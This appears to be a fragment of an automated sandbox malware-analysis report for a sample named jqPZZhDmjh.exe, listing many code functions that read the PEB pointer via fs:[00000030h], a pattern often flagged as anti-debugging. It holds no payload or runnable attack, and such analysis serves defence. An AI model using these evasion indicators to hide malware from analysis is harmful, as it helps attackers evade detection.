              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA2C3 mov eax, dword ptr fs:[00000030h]0_2_015BA2C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C02E1 mov eax, dword ptr fs:[00000030h]0_2_015C02E1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C02E1 mov eax, dword ptr fs:[00000030h]0_2_015C02E1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C02E1 mov eax, dword ptr fs:[00000030h]0_2_015C02E1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016862D6 mov eax, dword ptr fs:[00000030h]0_2_016862D6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov eax, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov ecx, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov eax, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov eax, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov eax, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016462A0 mov eax, dword ptr fs:[00000030h]0_2_016462A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE284 mov eax, dword ptr fs:[00000030h]0_2_015EE284
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE284 mov eax, dword ptr fs:[00000030h]0_2_015EE284
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01630283 mov eax, dword ptr fs:[00000030h]0_2_01630283
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01630283 mov eax, dword ptr fs:[00000030h]0_2_01630283
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01630283 mov eax, dword ptr fs:[00000030h]0_2_01630283
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8550 mov eax, dword ptr fs:[00000030h]0_2_015B8550
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8550 mov eax, dword ptr fs:[00000030h]0_2_015B8550
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E656A mov eax, dword ptr fs:[00000030h]0_2_015E656A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E656A mov eax, dword ptr fs:[00000030h]0_2_015E656A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E656A mov eax, dword ptr fs:[00000030h]0_2_015E656A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE53E mov eax, dword ptr fs:[00000030h]0_2_015DE53E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE53E mov eax, dword ptr fs:[00000030h]0_2_015DE53E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE53E mov eax, dword ptr fs:[00000030h]0_2_015DE53E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE53E mov eax, dword ptr fs:[00000030h]0_2_015DE53E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE53E mov eax, dword ptr fs:[00000030h]0_2_015DE53E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646500 mov eax, dword ptr fs:[00000030h]0_2_01646500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684500 mov eax, dword ptr fs:[00000030h]0_2_01684500
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0535 mov eax, dword ptr fs:[00000030h]0_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B65D0 mov eax, dword ptr fs:[00000030h]0_2_015B65D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA5D0 mov eax, dword ptr fs:[00000030h]0_2_015EA5D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA5D0 mov eax, dword ptr fs:[00000030h]0_2_015EA5D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE5CF mov eax, dword ptr fs:[00000030h]0_2_015EE5CF
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE5CF mov eax, dword ptr fs:[00000030h]0_2_015EE5CF
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC5ED mov eax, dword ptr fs:[00000030h]0_2_015EC5ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC5ED mov eax, dword ptr fs:[00000030h]0_2_015EC5ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE5E7 mov eax, dword ptr fs:[00000030h]0_2_015DE5E7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B25E0 mov eax, dword ptr fs:[00000030h]0_2_015B25E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE59C mov eax, dword ptr fs:[00000030h]0_2_015EE59C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016305A7 mov eax, dword ptr fs:[00000030h]0_2_016305A7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016305A7 mov eax, dword ptr fs:[00000030h]0_2_016305A7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016305A7 mov eax, dword ptr fs:[00000030h]0_2_016305A7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E4588 mov eax, dword ptr fs:[00000030h]0_2_015E4588
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B2582 mov eax, dword ptr fs:[00000030h]0_2_015B2582
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B2582 mov ecx, dword ptr fs:[00000030h]0_2_015B2582
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D45B1 mov eax, dword ptr fs:[00000030h]0_2_015D45B1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D45B1 mov eax, dword ptr fs:[00000030h]0_2_015D45B1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163C460 mov ecx, dword ptr fs:[00000030h]0_2_0163C460
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A645D mov eax, dword ptr fs:[00000030h]0_2_015A645D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D245A mov eax, dword ptr fs:[00000030h]0_2_015D245A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE443 mov eax, dword ptr fs:[00000030h]0_2_015EE443
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DA470 mov eax, dword ptr fs:[00000030h]0_2_015DA470
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166A456 mov eax, dword ptr fs:[00000030h]0_2_0166A456
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01636420 mov eax, dword ptr fs:[00000030h]0_2_01636420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E8402 mov eax, dword ptr fs:[00000030h]0_2_015E8402
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E8402 mov eax, dword ptr fs:[00000030h]0_2_015E8402
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E8402 mov eax, dword ptr fs:[00000030h]0_2_015E8402
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA430 mov eax, dword ptr fs:[00000030h]0_2_015EA430
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE420 mov eax, dword ptr fs:[00000030h]0_2_015AE420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE420 mov eax, dword ptr fs:[00000030h]0_2_015AE420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AE420 mov eax, dword ptr fs:[00000030h]0_2_015AE420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC427 mov eax, dword ptr fs:[00000030h]0_2_015AC427
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B04E5 mov ecx, dword ptr fs:[00000030h]0_2_015B04E5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163A4B0 mov eax, dword ptr fs:[00000030h]0_2_0163A4B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E44B0 mov ecx, dword ptr fs:[00000030h]0_2_015E44B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B64AB mov eax, dword ptr fs:[00000030h]0_2_015B64AB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166A49A mov eax, dword ptr fs:[00000030h]0_2_0166A49A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0750 mov eax, dword ptr fs:[00000030h]0_2_015B0750
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2750 mov eax, dword ptr fs:[00000030h]0_2_015F2750
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2750 mov eax, dword ptr fs:[00000030h]0_2_015F2750
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E674D mov esi, dword ptr fs:[00000030h]0_2_015E674D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E674D mov eax, dword ptr fs:[00000030h]0_2_015E674D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E674D mov eax, dword ptr fs:[00000030h]0_2_015E674D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8770 mov eax, dword ptr fs:[00000030h]0_2_015B8770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0770 mov eax, dword ptr fs:[00000030h]0_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01634755 mov eax, dword ptr fs:[00000030h]0_2_01634755
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163E75D mov eax, dword ptr fs:[00000030h]0_2_0163E75D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0710 mov eax, dword ptr fs:[00000030h]0_2_015B0710
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E0710 mov eax, dword ptr fs:[00000030h]0_2_015E0710
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162C730 mov eax, dword ptr fs:[00000030h]0_2_0162C730
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC700 mov eax, dword ptr fs:[00000030h]0_2_015EC700
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E273C mov eax, dword ptr fs:[00000030h]0_2_015E273C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E273C mov ecx, dword ptr fs:[00000030h]0_2_015E273C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E273C mov eax, dword ptr fs:[00000030h]0_2_015E273C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC720 mov eax, dword ptr fs:[00000030h]0_2_015EC720
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC720 mov eax, dword ptr fs:[00000030h]0_2_015EC720
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163E7E1 mov eax, dword ptr fs:[00000030h]0_2_0163E7E1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BC7C0 mov eax, dword ptr fs:[00000030h]0_2_015BC7C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B47FB mov eax, dword ptr fs:[00000030h]0_2_015B47FB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B47FB mov eax, dword ptr fs:[00000030h]0_2_015B47FB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016307C3 mov eax, dword ptr fs:[00000030h]0_2_016307C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D27ED mov eax, dword ptr fs:[00000030h]0_2_015D27ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D27ED mov eax, dword ptr fs:[00000030h]0_2_015D27ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D27ED mov eax, dword ptr fs:[00000030h]0_2_015D27ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016647A0 mov eax, dword ptr fs:[00000030h]0_2_016647A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165678E mov eax, dword ptr fs:[00000030h]0_2_0165678E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B07AF mov eax, dword ptr fs:[00000030h]0_2_015B07AF
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167866E mov eax, dword ptr fs:[00000030h]0_2_0167866E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167866E mov eax, dword ptr fs:[00000030h]0_2_0167866E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CC640 mov eax, dword ptr fs:[00000030h]0_2_015CC640
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E2674 mov eax, dword ptr fs:[00000030h]0_2_015E2674
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA660 mov eax, dword ptr fs:[00000030h]0_2_015EA660
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA660 mov eax, dword ptr fs:[00000030h]0_2_015EA660
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F2619 mov eax, dword ptr fs:[00000030h]0_2_015F2619
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C260B mov eax, dword ptr fs:[00000030h]0_2_015C260B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E609 mov eax, dword ptr fs:[00000030h]0_2_0162E609
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B262C mov eax, dword ptr fs:[00000030h]0_2_015B262C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE627 mov eax, dword ptr fs:[00000030h]0_2_015CE627
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E6620 mov eax, dword ptr fs:[00000030h]0_2_015E6620
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E8620 mov eax, dword ptr fs:[00000030h]0_2_015E8620
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E6F2 mov eax, dword ptr fs:[00000030h]0_2_0162E6F2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E6F2 mov eax, dword ptr fs:[00000030h]0_2_0162E6F2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E6F2 mov eax, dword ptr fs:[00000030h]0_2_0162E6F2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E6F2 mov eax, dword ptr fs:[00000030h]0_2_0162E6F2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016306F1 mov eax, dword ptr fs:[00000030h]0_2_016306F1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016306F1 mov eax, dword ptr fs:[00000030h]0_2_016306F1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA6C7 mov ebx, dword ptr fs:[00000030h]0_2_015EA6C7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA6C7 mov eax, dword ptr fs:[00000030h]0_2_015EA6C7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4690 mov eax, dword ptr fs:[00000030h]0_2_015B4690
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4690 mov eax, dword ptr fs:[00000030h]0_2_015B4690
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E66B0 mov eax, dword ptr fs:[00000030h]0_2_015E66B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC6A6 mov eax, dword ptr fs:[00000030h]0_2_015EC6A6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01654978 mov eax, dword ptr fs:[00000030h]0_2_01654978
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01654978 mov eax, dword ptr fs:[00000030h]0_2_01654978
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163C97C mov eax, dword ptr fs:[00000030h]0_2_0163C97C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01630946 mov eax, dword ptr fs:[00000030h]0_2_01630946
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684940 mov eax, dword ptr fs:[00000030h]0_2_01684940
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F096E mov eax, dword ptr fs:[00000030h]0_2_015F096E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F096E mov edx, dword ptr fs:[00000030h]0_2_015F096E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F096E mov eax, dword ptr fs:[00000030h]0_2_015F096E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D6962 mov eax, dword ptr fs:[00000030h]0_2_015D6962
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D6962 mov eax, dword ptr fs:[00000030h]0_2_015D6962
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D6962 mov eax, dword ptr fs:[00000030h]0_2_015D6962
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8918 mov eax, dword ptr fs:[00000030h]0_2_015A8918
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8918 mov eax, dword ptr fs:[00000030h]0_2_015A8918
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163892A mov eax, dword ptr fs:[00000030h]0_2_0163892A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0164892B mov eax, dword ptr fs:[00000030h]0_2_0164892B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E908 mov eax, dword ptr fs:[00000030h]0_2_0162E908
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E908 mov eax, dword ptr fs:[00000030h]0_2_0162E908
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163C912 mov eax, dword ptr fs:[00000030h]0_2_0163C912
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163E9E0 mov eax, dword ptr fs:[00000030h]0_2_0163E9E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BA9D0 mov eax, dword ptr fs:[00000030h]0_2_015BA9D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E49D0 mov eax, dword ptr fs:[00000030h]0_2_015E49D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016469C0 mov eax, dword ptr fs:[00000030h]0_2_016469C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E29F9 mov eax, dword ptr fs:[00000030h]0_2_015E29F9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E29F9 mov eax, dword ptr fs:[00000030h]0_2_015E29F9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167A9D3 mov eax, dword ptr fs:[00000030h]0_2_0167A9D3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016389B3 mov esi, dword ptr fs:[00000030h]0_2_016389B3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016389B3 mov eax, dword ptr fs:[00000030h]0_2_016389B3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016389B3 mov eax, dword ptr fs:[00000030h]0_2_016389B3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B09AD mov eax, dword ptr fs:[00000030h]0_2_015B09AD
